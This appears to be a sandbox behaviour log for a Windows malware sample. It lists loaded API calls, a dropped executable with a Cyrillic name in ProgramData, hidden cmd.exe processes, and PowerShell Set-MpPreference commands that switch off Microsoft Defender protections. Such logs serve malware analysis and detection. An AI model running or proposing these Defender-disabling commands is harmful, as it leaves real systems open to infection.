DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegQueryValueEx
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegQueryValueEx
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/CryptAcquireContextA
DynamicLoader: ADVAPI32.dll/CryptReleaseContext
DynamicLoader: ADVAPI32.dll/CryptCreateHash
DynamicLoader: ADVAPI32.dll/CryptDestroyHash
DynamicLoader: ADVAPI32.dll/CryptHashData
DynamicLoader: ADVAPI32.dll/CryptGetHashParam
DynamicLoader: ADVAPI32.dll/CryptImportKey
DynamicLoader: ADVAPI32.dll/CryptExportKey
DynamicLoader: ADVAPI32.dll/CryptGenKey
DynamicLoader: ADVAPI32.dll/CryptGetKeyParam
DynamicLoader: ADVAPI32.dll/CryptDestroyKey
DynamicLoader: ADVAPI32.dll/CryptVerifySignatureA
DynamicLoader: ADVAPI32.dll/CryptSignHashA
DynamicLoader: ADVAPI32.dll/CryptGetProvParam
DynamicLoader: ADVAPI32.dll/CryptGetUserKey
DynamicLoader: ADVAPI32.dll/CryptEnumProvidersA
DynamicLoader: CRYPTSP.dll/CryptImportKey
DynamicLoader: CRYPTSP.dll/CryptHashData
DynamicLoader: CRYPTSP.dll/CryptGetHashParam
DynamicLoader: CRYPTSP.dll/CryptDestroyHash
DynamicLoader: CRYPTSP.dll/CryptDestroyKey
DynamicLoader: mscoreei.dll/_CorDllMain_RetAddr
DynamicLoader: mscoreei.dll/_CorDllMain
DynamicLoader: mscoree.dll/GetTokenForVTableEntry
DynamicLoader: mscoree.dll/SetTargetForVTableEntry
DynamicLoader: mscoree.dll/GetTargetForVTableEntry
DynamicLoader: mscoreei.dll/LoadLibraryShim_RetAddr
DynamicLoader: mscoreei.dll/LoadLibraryShim
DynamicLoader: culture.dll/ConvertLangIdToCultureName
DynamicLoader: ole32.dll/CoCreateGuid
DynamicLoader: kernel32.dll/CreateFile
DynamicLoader: kernel32.dll/CreateFileW
DynamicLoader: kernel32.dll/GetConsoleScreenBufferInfo
DynamicLoader: kernel32.dll/GetConsoleScreenBufferInfoW
DynamicLoader: kernel32.dll/GetCurrentProcess
DynamicLoader: kernel32.dll/GetCurrentProcessW
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: ADVAPI32.dll/OpenProcessTokenW
DynamicLoader: kernel32.dll/LocalFree
DynamicLoader: ADVAPI32.dll/GetTokenInformation
DynamicLoader: ADVAPI32.dll/GetTokenInformationW
DynamicLoader: kernel32.dll/LocalAlloc
DynamicLoader: kernel32.dll/LocalAllocW
DynamicLoader: mscoree.dll/ND_RI4
DynamicLoader: mscoreei.dll/ND_RI4_RetAddr
DynamicLoader: mscoreei.dll/ND_RI4
DynamicLoader: ADVAPI32.dll/DuplicateTokenEx
DynamicLoader: ADVAPI32.dll/DuplicateTokenExW
DynamicLoader: ADVAPI32.dll/CheckTokenMembership
DynamicLoader: ADVAPI32.dll/CheckTokenMembershipW
DynamicLoader: kernel32.dll/GetConsoleTitle
DynamicLoader: kernel32.dll/GetConsoleTitleW
DynamicLoader: mscorjit.dll/getJit
DynamicLoader: mscorwks.dll/GetCLRFunction
DynamicLoader: kernel32.dll/SetConsoleTitle
DynamicLoader: kernel32.dll/SetConsoleTitleW
DynamicLoader: kernel32.dll/SetConsoleCtrlHandler
DynamicLoader: kernel32.dll/SetConsoleCtrlHandlerW
DynamicLoader: kernel32.dll/CreateEvent
DynamicLoader: kernel32.dll/CreateEventW
DynamicLoader: ntdll.dll/WinSqmIsOptedIn
DynamicLoader: kernel32.dll/ExpandEnvironmentStrings
DynamicLoader: kernel32.dll/ExpandEnvironmentStringsW
DynamicLoader: shfolder.dll/SHGetFolderPath
DynamicLoader: shfolder.dll/SHGetFolderPathW
DynamicLoader: kernel32.dll/SetEnvironmentVariable
DynamicLoader: kernel32.dll/SetEnvironmentVariableW
DynamicLoader: kernel32.dll/GetACP
DynamicLoader: kernel32.dll/UnmapViewOfFile
DynamicLoader: kernel32.dll/CreateFile
DynamicLoader: kernel32.dll/CreateFileW
DynamicLoader: kernel32.dll/GetFileType
DynamicLoader: kernel32.dll/ReadFile
DynamicLoader: kernel32.dll/GetSystemInfo
DynamicLoader: kernel32.dll/VirtualQuery
DynamicLoader: ADVAPI32.dll/RegQueryInfoKey
DynamicLoader: ADVAPI32.dll/RegQueryInfoKeyW
DynamicLoader: ADVAPI32.dll/RegEnumValue
DynamicLoader: ADVAPI32.dll/RegEnumValueW
DynamicLoader: ADVAPI32.dll/RegEnumKeyEx
DynamicLoader: ADVAPI32.dll/RegEnumKeyExW
DynamicLoader: secur32.dll/GetUserNameEx
DynamicLoader: secur32.dll/GetUserNameExW
DynamicLoader: ADVAPI32.dll/GetUserName
DynamicLoader: ADVAPI32.dll/GetUserNameW
DynamicLoader: kernel32.dll/ReleaseMutex
DynamicLoader: ADVAPI32.dll/RegisterEventSource
DynamicLoader: ADVAPI32.dll/RegisterEventSourceW
DynamicLoader: ADVAPI32.dll/DeregisterEventSource
DynamicLoader: ADVAPI32.dll/ReportEvent
DynamicLoader: ADVAPI32.dll/ReportEventW
DynamicLoader: kernel32.dll/GetLogicalDrives
DynamicLoader: kernel32.dll/GetDriveType
DynamicLoader: kernel32.dll/GetDriveTypeW
DynamicLoader: kernel32.dll/GetVolumeInformation
DynamicLoader: kernel32.dll/GetVolumeInformationW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: kernel32.dll/GetCurrentDirectory
DynamicLoader: kernel32.dll/GetCurrentDirectoryW
DynamicLoader: mscoreei.dll/GetTokenForVTableEntry_RetAddr
DynamicLoader: mscoreei.dll/GetTokenForVTableEntry
DynamicLoader: mscoreei.dll/SetTargetForVTableEntry_RetAddr
DynamicLoader: mscoreei.dll/SetTargetForVTableEntry
DynamicLoader: kernel32.dll/GetLastError
DynamicLoader: kernel32.dll/LocalAlloc
DynamicLoader: mscoree.dll/IEE
DynamicLoader: kernel32.dll/GetStdHandle
DynamicLoader: kernel32.dll/GetStdHandleW
DynamicLoader: kernel32.dll/GetConsoleMode
DynamicLoader: kernel32.dll/GetConsoleModeW
DynamicLoader: kernel32.dll/SetEvent
DynamicLoader: kernel32.dll/SetThreadUILanguage
DynamicLoader: kernel32.dll/SetThreadUILanguageW
DynamicLoader: kernel32.dll/FindFirstFile
DynamicLoader: kernel32.dll/FindFirstFileW
DynamicLoader: kernel32.dll/FindClose
DynamicLoader: CRYPTSP.dll/CryptExportKey
DynamicLoader: CRYPTSP.dll/CryptCreateHash
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: CRYPTSP.dll/CryptReleaseContext
DynamicLoader: mscoree.dll/CorExitProcess
DynamicLoader: mscoreei.dll/CorExitProcess_RetAddr
DynamicLoader: mscoreei.dll/CorExitProcess
DynamicLoader: mscorwks.dll/CorExitProcess
DynamicLoader: mscorwks.dll/_CorDllMain
DynamicLoader: kernel32.dll/CreateActCtxW
DynamicLoader: kernel32.dll/AddRefActCtx
DynamicLoader: kernel32.dll/ReleaseActCtx
DynamicLoader: kernel32.dll/ActivateActCtx
DynamicLoader: kernel32.dll/DeactivateActCtx
DynamicLoader: kernel32.dll/GetCurrentActCtx
DynamicLoader: kernel32.dll/QueryActCtxW
DynamicLoader: netutils.dll/NetApiBufferFree
DynamicLoader: ADVAPI32.dll/UnregisterTraceGuids
DynamicLoader: CRYPTBASE.dll/SystemFunction036
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: shell32.dll/
DynamicLoader: ole32.dll/CoGetApartmentType
DynamicLoader: ole32.dll/CoRegisterInitializeSpy
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: comctl32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/CoGetMalloc
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: ole32.dll/CreateBindCtx
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: ADVAPI32.dll/RegEnumKeyW
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ADVAPI32.dll/InitializeSecurityDescriptor
DynamicLoader: ADVAPI32.dll/SetEntriesInAclW
DynamicLoader: ntmarta.dll/GetMartaExtensionInterface
DynamicLoader: ADVAPI32.dll/SetSecurityDescriptorDacl
DynamicLoader: ADVAPI32.dll/IsTextUnicode
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: shell32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_Size_ExW
DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_ExW
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: ole32.dll/CoGetMalloc
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: ntdll.dll/RtlDllShutdownInProgress
DynamicLoader: LINKINFO.dll/IsValidLinkInfo
DynamicLoader: propsys.dll/
DynamicLoader: propsys.dll/PSGetNameFromPropertyKey
DynamicLoader: propsys.dll/PSStringFromPropertyKey
DynamicLoader: propsys.dll/InitVariantFromBuffer
DynamicLoader: OLEAUT32.dll/
DynamicLoader: propsys.dll/PropVariantToGUID
DynamicLoader: ole32.dll/PropVariantClear
DynamicLoader: propsys.dll/PSCreateMemoryPropertyStore
DynamicLoader: sechost.dll/ConvertSidToStringSidW
DynamicLoader: profapi.dll/
DynamicLoader: LINKINFO.dll/CreateLinkInfoW
DynamicLoader: USER32.dll/IsCharAlphaW
DynamicLoader: USER32.dll/CharPrevW
DynamicLoader: ntshrui.dll/GetNetResourceFromLocalPathW
DynamicLoader: srvcli.dll/NetShareEnum
DynamicLoader: cscapi.dll/CscNetApiGetInterface
DynamicLoader: slc.dll/SLGetWindowsInformationDWORD
DynamicLoader: SHLWAPI.dll/PathRemoveFileSpecW
DynamicLoader: LINKINFO.dll/DestroyLinkInfo
DynamicLoader: propsys.dll/PropVariantToBoolean
DynamicLoader: CRYPTSP.dll/CryptAcquireContextW
DynamicLoader: CRYPTSP.dll/CryptGenRandom
DynamicLoader: CRYPTSP.dll/CryptReleaseContext
DynamicLoader: ADVAPI32.dll/GetSecurityInfo
DynamicLoader: ADVAPI32.dll/SetSecurityInfo
DynamicLoader: ADVAPI32.dll/GetSecurityDescriptorControl
DynamicLoader: ole32.dll/CoRevokeInitializeSpy
DynamicLoader: comctl32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegQueryInfoKeyW
DynamicLoader: ADVAPI32.dll/RegEnumKeyExW
DynamicLoader: ADVAPI32.dll/RegEnumValueW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: mscoree.dll/
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: mscoreei.dll/RegisterShimImplCallback
DynamicLoader: mscoreei.dll/RegisterShimImplCleanupCallback
DynamicLoader: mscoreei.dll/SetShellShimInstance
DynamicLoader: mscoreei.dll/OnShimDllMainCalled
DynamicLoader: mscoreei.dll/CorBindToRuntimeEx_RetAddr
DynamicLoader: mscoreei.dll/CorBindToRuntimeEx
DynamicLoader: SHLWAPI.dll/UrlIsW
DynamicLoader: kernel32.dll/GetCurrentPackageId
DynamicLoader: kernel32.dll/InitializeCriticalSectionAndSpinCount
DynamicLoader: msvcrt.dll/_set_error_mode
DynamicLoader: msvcrt.dll/?set_terminate@@YAP6AXXZP6AXXZ@Z
DynamicLoader: msvcrt.dll/_get_terminate
DynamicLoader: kernel32.dll/FindActCtxSectionStringW
DynamicLoader: kernel32.dll/GetSystemWindowsDirectoryW
DynamicLoader: mscoree.dll/GetProcessExecutableHeap
DynamicLoader: mscoreei.dll/GetProcessExecutableHeap_RetAddr
DynamicLoader: mscoreei.dll/GetProcessExecutableHeap
DynamicLoader: mscorwks.dll/SetLoadedByMscoree
DynamicLoader: mscorwks.dll/DllGetClassObjectInternal
DynamicLoader: mscorwks.dll/GetCLRFunction
DynamicLoader: ADVAPI32.dll/RegisterTraceGuidsW
DynamicLoader: ADVAPI32.dll/UnregisterTraceGuids
DynamicLoader: ADVAPI32.dll/GetTraceLoggerHandle
DynamicLoader: ADVAPI32.dll/GetTraceEnableLevel
DynamicLoader: ADVAPI32.dll/GetTraceEnableFlags
DynamicLoader: ADVAPI32.dll/TraceEvent
DynamicLoader: mscoree.dll/IEE
DynamicLoader: mscoreei.dll/IEE_RetAddr
DynamicLoader: mscoreei.dll/IEE
DynamicLoader: mscorwks.dll/IEE
DynamicLoader: mscoree.dll/GetStartupFlags
DynamicLoader: mscoreei.dll/GetStartupFlags_RetAddr
DynamicLoader: mscoreei.dll/GetStartupFlags
DynamicLoader: mscoree.dll/GetHostConfigurationFile
DynamicLoader: mscoreei.dll/GetHostConfigurationFile_RetAddr
DynamicLoader: mscoreei.dll/GetHostConfigurationFile
DynamicLoader: mscoreei.dll/GetCORVersion_RetAddr
DynamicLoader: mscoreei.dll/GetCORVersion
DynamicLoader: mscoree.dll/GetCORSystemDirectory
DynamicLoader: mscoreei.dll/GetCORSystemDirectory_RetAddr
DynamicLoader: mscoreei.dll/CreateConfigStream_RetAddr
DynamicLoader: mscoreei.dll/CreateConfigStream
DynamicLoader: ntdll.dll/RtlVirtualUnwind
DynamicLoader: kernel32.dll/IsWow64Process
DynamicLoader: kernel32.dll/GetSystemWindowsDirectoryW
DynamicLoader: ADVAPI32.dll/AllocateAndInitializeSid
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: ADVAPI32.dll/GetTokenInformation
DynamicLoader: ADVAPI32.dll/InitializeAcl
DynamicLoader: ADVAPI32.dll/AddAccessAllowedAce
DynamicLoader: ADVAPI32.dll/FreeSid
DynamicLoader: ADVAPI32.dll/AllocateAndInitializeSid
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: ADVAPI32.dll/GetTokenInformation
DynamicLoader: ADVAPI32.dll/InitializeAcl
DynamicLoader: ADVAPI32.dll/AddAccessAllowedAce
DynamicLoader: ADVAPI32.dll/FreeSid
DynamicLoader: kernel32.dll/SetThreadStackGuarantee
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: kernel32.dll/AddVectoredContinueHandler
DynamicLoader: kernel32.dll/RemoveVectoredContinueHandler
DynamicLoader: ADVAPI32.dll/ConvertSidToStringSidW
DynamicLoader: shell32.dll/SHGetFolderPathW
DynamicLoader: kernel32.dll/FlushProcessWriteBuffers
DynamicLoader: kernel32.dll/GetWriteWatch
DynamicLoader: kernel32.dll/ResetWriteWatch
DynamicLoader: kernel32.dll/CreateMemoryResourceNotification
DynamicLoader: kernel32.dll/QueryMemoryResourceNotification
DynamicLoader: kernel32.dll/GlobalMemoryStatusEx
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: OLEAUT32.dll/
DynamicLoader: kernel32.dll/GetUserDefaultUILanguage
DynamicLoader: ole32.dll/CoGetContextToken
DynamicLoader: OLEAUT32.dll/
DynamicLoader: kernel32.dll/GetVersionEx
DynamicLoader: kernel32.dll/GetVersionExW
DynamicLoader: kernel32.dll/GetVersionEx
DynamicLoader: kernel32.dll/GetVersionExW
DynamicLoader: kernel32.dll/GetFullPathName
DynamicLoader: kernel32.dll/GetFullPathNameW
DynamicLoader: kernel32.dll/SetErrorMode
DynamicLoader: kernel32.dll/GetFileAttributesEx
DynamicLoader: kernel32.dll/GetFileAttributesExW
DynamicLoader: kernel32.dll/SetErrorMode
DynamicLoader: version.dll/GetFileVersionInfoSize
DynamicLoader: version.dll/GetFileVersionInfoSizeW
DynamicLoader: version.dll/GetFileVersionInfo
DynamicLoader: version.dll/GetFileVersionInfoW
DynamicLoader: version.dll/VerQueryValue
DynamicLoader: version.dll/VerQueryValueW
DynamicLoader: kernel32.dll/lstrlen
DynamicLoader: kernel32.dll/lstrlenW
DynamicLoader: mscoree.dll/ND_RI2
DynamicLoader: mscoreei.dll/ND_RI2_RetAddr
DynamicLoader: mscoreei.dll/ND_RI2
DynamicLoader: kernel32.dll/lstrlen
DynamicLoader: kernel32.dll/lstrlenW
DynamicLoader: kernel32.dll/lstrcpy
DynamicLoader: kernel32.dll/lstrcpyW
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: version.dll/VerLanguageName
DynamicLoader: version.dll/VerLanguageNameW
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/GetCurrentProcessId
DynamicLoader: kernel32.dll/GetCurrentProcessIdW
DynamicLoader: ADVAPI32.dll/LookupPrivilegeValue
DynamicLoader: ADVAPI32.dll/LookupPrivilegeValueW
DynamicLoader: kernel32.dll/GetCurrentProcess
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: ADVAPI32.dll/OpenProcessTokenW
DynamicLoader: ADVAPI32.dll/AdjustTokenPrivileges
DynamicLoader: ADVAPI32.dll/AdjustTokenPrivilegesW
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/OpenProcess
DynamicLoader: kernel32.dll/OpenProcessW
DynamicLoader: PSAPI.DLL/EnumProcessModules
DynamicLoader: PSAPI.DLL/EnumProcessModulesW
DynamicLoader: PSAPI.DLL/GetModuleInformation
DynamicLoader: PSAPI.DLL/GetModuleInformationW
DynamicLoader: PSAPI.DLL/GetModuleBaseName
DynamicLoader: PSAPI.DLL/GetModuleBaseNameW
DynamicLoader: PSAPI.DLL/GetModuleFileNameEx
DynamicLoader: PSAPI.DLL/GetModuleFileNameExW
DynamicLoader: kernel32.dll/GetExitCodeProcess
DynamicLoader: kernel32.dll/GetExitCodeProcessW
DynamicLoader: ntdll.dll/NtQuerySystemInformation
DynamicLoader: ntdll.dll/NtQuerySystemInformationW
DynamicLoader: USER32.dll/EnumWindows
DynamicLoader: USER32.dll/EnumWindowsW
DynamicLoader: USER32.dll/GetWindowThreadProcessId
DynamicLoader: USER32.dll/GetWindowThreadProcessIdW
DynamicLoader: kernel32.dll/WerSetFlags
DynamicLoader: kernel32.dll/SetThreadPreferredUILanguages
DynamicLoader: kernel32.dll/SetThreadPreferredUILanguagesW
DynamicLoader: kernel32.dll/GetThreadPreferredUILanguages
DynamicLoader: kernel32.dll/GetThreadPreferredUILanguagesW
DynamicLoader: kernel32.dll/GetUserDefaultLocaleName
DynamicLoader: kernel32.dll/GetUserDefaultLocaleNameW
DynamicLoader: kernel32.dll/GetEnvironmentVariable
DynamicLoader: kernel32.dll/GetEnvironmentVariableW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ADVAPI32.dll/RegOpenKeyEx
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegQueryValueEx
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegQueryValueEx
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/CryptAcquireContextA
DynamicLoader: ADVAPI32.dll/CryptReleaseContext
DynamicLoader: ADVAPI32.dll/CryptCreateHash
DynamicLoader: ADVAPI32.dll/CryptDestroyHash
DynamicLoader: ADVAPI32.dll/CryptHashData
DynamicLoader: ADVAPI32.dll/CryptGetHashParam
DynamicLoader: ADVAPI32.dll/CryptImportKey
DynamicLoader: ADVAPI32.dll/CryptExportKey
DynamicLoader: ADVAPI32.dll/CryptGenKey
DynamicLoader: ADVAPI32.dll/CryptGetKeyParam
DynamicLoader: ADVAPI32.dll/CryptDestroyKey
DynamicLoader: ADVAPI32.dll/CryptVerifySignatureA
DynamicLoader: ADVAPI32.dll/CryptSignHashA
DynamicLoader: ADVAPI32.dll/CryptGetProvParam
DynamicLoader: ADVAPI32.dll/CryptGetUserKey
DynamicLoader: ADVAPI32.dll/CryptEnumProvidersA
DynamicLoader: CRYPTSP.dll/CryptImportKey
DynamicLoader: CRYPTSP.dll/CryptHashData
DynamicLoader: CRYPTSP.dll/CryptGetHashParam
DynamicLoader: CRYPTSP.dll/CryptDestroyHash
DynamicLoader: CRYPTSP.dll/CryptDestroyKey
DynamicLoader: mscoreei.dll/_CorDllMain_RetAddr
DynamicLoader: mscoreei.dll/_CorDllMain
DynamicLoader: mscoree.dll/GetTokenForVTableEntry
DynamicLoader: mscoree.dll/SetTargetForVTableEntry
DynamicLoader: mscoree.dll/GetTargetForVTableEntry
DynamicLoader: mscoreei.dll/LoadLibraryShim_RetAddr
DynamicLoader: mscoreei.dll/LoadLibraryShim
DynamicLoader: culture.dll/ConvertLangIdToCultureName
DynamicLoader: ole32.dll/CoCreateGuid
DynamicLoader: kernel32.dll/CreateFile
DynamicLoader: kernel32.dll/CreateFileW
DynamicLoader: kernel32.dll/GetConsoleScreenBufferInfo
DynamicLoader: kernel32.dll/GetConsoleScreenBufferInfoW
DynamicLoader: kernel32.dll/GetCurrentProcess
DynamicLoader: kernel32.dll/GetCurrentProcessW
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: ADVAPI32.dll/OpenProcessTokenW
DynamicLoader: kernel32.dll/LocalFree
DynamicLoader: ADVAPI32.dll/GetTokenInformation
DynamicLoader: ADVAPI32.dll/GetTokenInformationW
DynamicLoader: kernel32.dll/LocalAlloc
DynamicLoader: kernel32.dll/LocalAllocW
DynamicLoader: mscoree.dll/ND_RI4
DynamicLoader: mscoreei.dll/ND_RI4_RetAddr
DynamicLoader: mscoreei.dll/ND_RI4
DynamicLoader: ADVAPI32.dll/DuplicateTokenEx
DynamicLoader: ADVAPI32.dll/DuplicateTokenExW
DynamicLoader: ADVAPI32.dll/CheckTokenMembership
DynamicLoader: ADVAPI32.dll/CheckTokenMembershipW
DynamicLoader: kernel32.dll/GetConsoleTitle
DynamicLoader: kernel32.dll/GetConsoleTitleW
DynamicLoader: mscorjit.dll/getJit
DynamicLoader: mscorwks.dll/GetCLRFunction
DynamicLoader: kernel32.dll/SetConsoleTitle
DynamicLoader: kernel32.dll/SetConsoleTitleW
DynamicLoader: kernel32.dll/SetConsoleCtrlHandler
DynamicLoader: kernel32.dll/SetConsoleCtrlHandlerW
DynamicLoader: kernel32.dll/CreateEvent
DynamicLoader: kernel32.dll/CreateEventW
DynamicLoader: ntdll.dll/WinSqmIsOptedIn
DynamicLoader: kernel32.dll/ExpandEnvironmentStrings
DynamicLoader: kernel32.dll/ExpandEnvironmentStringsW
DynamicLoader: shfolder.dll/SHGetFolderPath
DynamicLoader: shfolder.dll/SHGetFolderPathW
DynamicLoader: kernel32.dll/SetEnvironmentVariable
DynamicLoader: kernel32.dll/SetEnvironmentVariableW
DynamicLoader: kernel32.dll/GetACP
DynamicLoader: kernel32.dll/UnmapViewOfFile
DynamicLoader: kernel32.dll/CreateFile
DynamicLoader: kernel32.dll/CreateFileW
DynamicLoader: kernel32.dll/GetFileType
DynamicLoader: kernel32.dll/ReadFile
DynamicLoader: kernel32.dll/GetSystemInfo
DynamicLoader: kernel32.dll/VirtualQuery
DynamicLoader: ADVAPI32.dll/RegQueryInfoKey
DynamicLoader: ADVAPI32.dll/RegQueryInfoKeyW
DynamicLoader: ADVAPI32.dll/RegEnumValue
DynamicLoader: ADVAPI32.dll/RegEnumValueW
DynamicLoader: ADVAPI32.dll/RegEnumKeyEx
DynamicLoader: ADVAPI32.dll/RegEnumKeyExW
DynamicLoader: secur32.dll/GetUserNameEx
DynamicLoader: secur32.dll/GetUserNameExW
DynamicLoader: ADVAPI32.dll/GetUserName
DynamicLoader: ADVAPI32.dll/GetUserNameW
DynamicLoader: kernel32.dll/ReleaseMutex
DynamicLoader: ADVAPI32.dll/RegisterEventSource
DynamicLoader: ADVAPI32.dll/RegisterEventSourceW
DynamicLoader: ADVAPI32.dll/DeregisterEventSource
DynamicLoader: ADVAPI32.dll/ReportEvent
DynamicLoader: ADVAPI32.dll/ReportEventW
DynamicLoader: kernel32.dll/GetLogicalDrives
DynamicLoader: kernel32.dll/GetDriveType
DynamicLoader: kernel32.dll/GetDriveTypeW
DynamicLoader: kernel32.dll/GetVolumeInformation
DynamicLoader: kernel32.dll/GetVolumeInformationW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: kernel32.dll/GetCurrentDirectory
DynamicLoader: kernel32.dll/GetCurrentDirectoryW
DynamicLoader: mscoreei.dll/GetTokenForVTableEntry_RetAddr
DynamicLoader: mscoreei.dll/GetTokenForVTableEntry
DynamicLoader: mscoreei.dll/SetTargetForVTableEntry_RetAddr
DynamicLoader: mscoreei.dll/SetTargetForVTableEntry
DynamicLoader: kernel32.dll/GetLastError
DynamicLoader: kernel32.dll/LocalAlloc
DynamicLoader: mscoree.dll/IEE
DynamicLoader: kernel32.dll/GetStdHandle
DynamicLoader: kernel32.dll/GetStdHandleW
DynamicLoader: kernel32.dll/GetConsoleMode
DynamicLoader: kernel32.dll/GetConsoleModeW
DynamicLoader: kernel32.dll/SetEvent
DynamicLoader: kernel32.dll/SetThreadUILanguage
DynamicLoader: kernel32.dll/SetThreadUILanguageW
DynamicLoader: kernel32.dll/FindFirstFile
DynamicLoader: kernel32.dll/FindFirstFileW
DynamicLoader: kernel32.dll/FindClose
DynamicLoader: CRYPTSP.dll/CryptExportKey
DynamicLoader: CRYPTSP.dll/CryptCreateHash
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: CRYPTSP.dll/CryptReleaseContext
DynamicLoader: mscoree.dll/CorExitProcess
DynamicLoader: mscoreei.dll/CorExitProcess_RetAddr
DynamicLoader: mscoreei.dll/CorExitProcess
DynamicLoader: mscorwks.dll/CorExitProcess
DynamicLoader: mscorwks.dll/_CorDllMain
DynamicLoader: kernel32.dll/CreateActCtxW
DynamicLoader: kernel32.dll/AddRefActCtx
DynamicLoader: kernel32.dll/ReleaseActCtx
DynamicLoader: kernel32.dll/ActivateActCtx
DynamicLoader: kernel32.dll/DeactivateActCtx
DynamicLoader: kernel32.dll/GetCurrentActCtx
DynamicLoader: kernel32.dll/QueryActCtxW
DynamicLoader: netutils.dll/NetApiBufferFree
DynamicLoader: ADVAPI32.dll/UnregisterTraceGuids
DynamicLoader: RPCRT4.dll/UuidFromStringW
DynamicLoader: RPCRT4.dll/RpcBindingCreateW
DynamicLoader: RPCRT4.dll/RpcBindingBind
DynamicLoader: sechost.dll/OpenSCManagerW
DynamicLoader: sechost.dll/OpenServiceW
DynamicLoader: sechost.dll/StartServiceW
DynamicLoader: sechost.dll/CloseServiceHandle
A process created a hidden window
Process: exlxo5YyAuKqn.exe -> C:\ProgramData\\xd1\x80\xd0\xbe\xd0\xbf\xd1\x80\xd0\xa3\xd0\x92\xd0\xb0\xd0\xab\xd1\x81\xd0\xb5\xd0\xbd\xd0\xbe\xd1\x80\xd1\x85.exe
Process: ропрУВаЫсенорх.exe -> cmd.exe
Process: ропрУВаЫсенорх.exe -> cmd.exe
Process: ропрУВаЫсенорх.exe -> cmd.exe
Process: ропрУВаЫсенорх.exe -> cmd.exe
Process: ропрУВаЫсенорх.exe -> cmd.exe
Process: ропрУВаЫсенорх.exe -> cmd.exe
Process: ропрУВаЫсенорх.exe -> cmd.exe
Process: ропрУВаЫсенорх.exe -> cmd.exe
Process: ропрУВаЫсенорх.exe -> cmd.exe
Process: ропрУВаЫсенорх.exe -> cmd.exe
Process: ропрУВаЫсенорх.exe -> cmd.exe
Process: ропрУВаЫсенорх.exe -> cmd.exe
A scripting utility was executed
command: "C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
command: cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
command: "C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -DisableBehaviorMonitoring $true
command: cmd.exe /c powershell Set-MpPreference -DisableBehaviorMonitoring $true
command: "C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -DisableBlockAtFirstSeen $true
command: cmd.exe /c powershell Set-MpPreference -DisableBlockAtFirstSeen $true
command: "C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -DisableIOAVProtection $true
command: cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
command: "C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -DisablePrivacyMode $true
command: cmd.exe /c powershell Set-MpPreference -DisablePrivacyMode $true
command: "C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -DisableIntrusionPreventionSystem $true
command: cmd.exe /c powershell Set-MpPreference -DisableIntrusionPreventionSystem $true
command: "C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -SevereThreatDefaultAction 6
command: cmd.exe /c powershell Set-MpPreference -SevereThreatDefaultAction 6
command: "C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -LowThreatDefaultAction 6
command: cmd.exe /c powershell Set-MpPreference -LowThreatDefaultAction 6
command: "C:\Windows\System32\cmd.exe" /c powershell Set-MpPreference -ModerateThreatDefaultAction 6
command: cmd.exe /c powershell Set-MpPreference -ModerateThreatDefaultAction 6
